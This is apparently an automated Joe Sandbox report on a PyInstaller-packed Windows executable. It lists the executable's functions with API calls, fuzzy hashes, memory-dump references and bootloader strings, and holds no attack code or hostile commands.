                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                              • Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                              • Instruction ID: 375ac81c0a1afec4dda26be2ed366408b50001e8b0028120e8fd544585be1f05
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CD08611F2414542FB54BB677A4652991625BC9BC4F888035EE2D03799DC3CD0514700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF7F91F0D00,?,?,?,00007FF7F91F236A,?,?,?,?,?,00007FF7F91F3B59), ref: 00007FF7F91FD6AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction ID: 4ca5cd52a44ddc0ed6aa6d754ea44280300fe51a4618d9d5b00d4a7fd9cba1d9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50F03A04E09A0E44FF647F616C412B992B04F94BB8FC802309E3E852EAEE2CA44482F0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction ID: 7bda02531730b8b89590b024f1c7978ae2ea06bbc3aa9d10b1d93ce67a436a7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6D15331E08A4686FB60AF34EC542ADB774FB84B58F900235DA6E536E8DF3CE5458790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E841B
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E849E
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84BD
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84CB
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84DC
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84E5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction ID: fdff8ec491896a23328cbf41d2d808ff7423be29052fd79de16381446acd9fcc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47412F21E0C54286EF75BF14BC446B9A3B0FB94754FC00671D56E826DCDF2CE54587A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction ID: 18a1dde9d9c542ff972fd2a0f1a51436f90a237a079196a8dc08a7e2c64853f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30312176A08B858AEB60AF60EC403EE7374FB84744F844439DA5E47BA8DF38D548C760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205CB5
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F9205608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920561C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA9B8: HeapFree.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA9B8: GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F91FA94F,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FA979
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F91FA94F,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FA99E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205CA4
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F9205668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205F1A
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205F2B
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205F3C
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F920617C), ref: 00007FF7F9205F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                              • Instruction ID: 710ed636d11e49654cdae276d78bd6cf1d969b7de673a3ac37cbff5431a5bc76
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8ED19122E0824246F7A4BF229C815B9A771FF44794FC48136DA6D876EDEF3DE44187A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction ID: 3572768d45e12153d67653adfa5f92bef6f25672701e186a93ff6b9ec44830e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92315636A14B8186EB60DF25EC406AEB3B4FB84754F940135DB6D43BA8EF3CD1458750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F91E88A7,?,?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E821C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2810: MessageBoxW.USER32 ref: 00007FF7F91E28EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                              • Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                              • Instruction ID: 998338be0356ef53edad8c5234d32c8da0b73fda9f7c5dc7afbe5a0bed39e020
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C517511E2964342FB55BF25FC516BAE2B1AF94780FC44431D62E826EDEE2CF40583E1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction ID: c36f94774f6ab4f024c77e6b184c67509492e4bd331c5dfa153205433277ec1a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6251C6266047A186DB34AF26A8181BEB7B1FB98B61F404135EBDF83694DF3CD145D720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: 3f16a011aafa4bf8f99b7e5f5abe6c6527e1760d4a1e3a758ce7a3956ad42edd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8128362E0814F86FB247E14B954279F6B9FB50798FC84135D7B9466CCEB3CE5408BA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction ID: 5bb8beb5652ff88e3a8c2e704395b0bc10e311342c33df1e193f6f55d6a44f28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8D16C22E0864187EB21BF65A8403AEA7B0FB45788F940135EE5D57BD9DF78F090C792
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7F91E2D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction ID: 968e6561d5ca9252b9187ce52e3381e71b3dcd33bc4c7334633531accefcc7f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1831B722B0864142FB20BF15BC146AAA6A5BF88798F800135EF5E937ADDE3CE546C350
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7F91E351A,?,00000000,00007FF7F91E3F23), ref: 00007FF7F91E2AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction ID: 1a99fab6e1f5fd11ff65ec8fe9c775221bb2b1cc97259773eb1a6d0d69708f47
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A217132A1878182E760EF51BC817EAA3A4BB88784F800135FE9D9369DDF3CE5458690
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
